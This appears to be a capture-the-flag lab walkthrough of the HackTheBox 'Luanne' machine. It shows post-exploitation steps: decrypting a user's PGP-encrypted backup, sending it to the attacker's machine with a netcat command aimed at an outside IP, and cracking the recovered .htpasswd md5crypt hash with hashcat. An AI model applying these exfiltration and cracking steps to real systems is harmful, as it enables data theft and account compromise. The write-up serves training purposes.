Backups

luanne$ ls -la
total 52
dr-xr-x---  7 r.michaels  users   512 Sep 16  2020 .
drwxr-xr-x  3 root        wheel   512 Sep 14  2020 ..
-rw-r--r--  1 r.michaels  users  1772 Feb 14  2020 .cshrc
drwx------  2 r.michaels  users   512 Sep 14  2020 .gnupg
-rw-r--r--  1 r.michaels  users   431 Feb 14  2020 .login
-rw-r--r--  1 r.michaels  users   265 Feb 14  2020 .logout
-rw-r--r--  1 r.michaels  users  1498 Feb 14  2020 .profile
-rw-r--r--  1 r.michaels  users   166 Feb 14  2020 .shrc
dr-x------  2 r.michaels  users   512 Sep 16  2020 .ssh
dr-xr-xr-x  2 r.michaels  users   512 Nov 24  2020 backups
dr-xr-x---  4 r.michaels  users   512 Sep 16  2020 devel
dr-x------  2 r.michaels  users   512 Sep 16  2020 public_html
-r--------  1 r.michaels  users    33 Sep 16  2020 user.txt

I found an interesting directory at the home directory of the r.michaels user after making a lateral movement; /home/r.michaels/backups

luanne$ cd backups/ ; ls -la                                                                                                           
total 12
dr-xr-xr-x  2 r.michaels  users   512 Nov 24  2020 .
dr-xr-x---  7 r.michaels  users   512 Sep 16  2020 ..
-r--------  1 r.michaels  users  1970 Nov 24  2020 devel_backup-2020-09-16.tar.gz.enc

inside, there is an encrypted archive, which appears to be a backup for the weather application on the 127.0.0.1:3001 socket

PGP

luanne$ netpgp --decrypt ~/backups/devel_backup-2020-09-16.tar.gz.enc --output=/tmp/devel_backup-2020-09-16.tar.gz;         
signature  2048/RSA (Encrypt or Sign) 3684eb1e5ded454a 2020-09-14 
Key fingerprint: 027a 3243 0691 2e46 0c29 9f46 3684 eb1e 5ded 454a 
uid              RSA 2048-bit key <r.michaels@localhost>

Working with PGP encryption/decryption, NetBSD uses netpgp, which is just like GnuPG’s gpg in Linux Since it was encrypted using the credential of the r.michaels user within this system using the user’s email address, I can just decrypt it back. I decrypted and saved it to the /tmp directory

luanne$ ls -la /tmp
total 20
drwxrwxrwt   2 root        wheel    48 Mar 20 17:29 .
drwxr-xr-x  21 root        wheel   512 Sep 16  2020 ..
-rw-------   1 r.michaels  wheel  1639 Mar 20 17:29 devel_backup-2020-09-16.tar.gz

The decrypted archive is now available at the /tmp directory

Archive

luanne$ nc 10.10.14.2 2222 < /tmp/devel_backup-2020-09-16.tar.gz                                                    
┌──(kali㉿kali)-[~/…/htb/labs/luanne/devel]
└─$ nnc 2222 > devel_backup-2020-09-16.tar.gz
listening on [any] 2222 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.218] 65417

I can then transfer it to Kali for review

┌──(kali㉿kali)-[~/…/htb/labs/luanne/devel]
└─$ tar -xf devel_backup-2020-09-16.tar.gz
┌──(kali㉿kali)-[~/…/htb/labs/luanne/devel]
└─$ tree -a devel-2020-09-16 
devel-2020-09-16
├── webapi
│   └── weather.lua
└── www
    ├── .htpasswd
    └── index.html
 
3 directories, 3 files

Extracting the backup from the archive. I can see the .htpasswd file once again. I should check that as it could be different.

┌──(kali㉿kali)-[~/…/htb/labs/luanne/devel]
└─$ cat devel-2020-09-16/www/.htpasswd 
webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.

This .htpasswd file is definitely not the same as the one that I found in the /var/www directory earlier. I will get to cracking right way

Password Cracking

┌──(kali㉿kali)-[~/…/luanne/devel/devel-2020-09-16/www]
└─$ hashcat -a 0 -m 500 webapi_user2.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.:littlebear             
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.
Time.Started.....: Mon Mar 20 18:39:44 2023 (1 sec)
Time.Estimated...: Mon Mar 20 18:39:45 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    14326 H/s (12.70ms) @ Accel:64 Loops:1000 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 13056/14344385 (0.09%)
Rejected.........: 0/13056 (0.00%)
Restore.Point....: 12864/14344385 (0.09%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1000
Candidate.Engine.: Device Generator
Candidates.#1....: volkswagen -> ilove2
Hardware.Mon.#1..: Util: 90%
 
Started: Mon Mar 20 18:39:42 2023
Stopped: Mon Mar 20 18:39:47 2023

hashcat was able to crack the password hash The cracked password is littlebear

I should check it for password reuse

InfoSec LAB

Explorer

Luanne_backups

Backups

PGP

Archive

Password Cracking

Interactive Graph View

Table of Contents

Backlinks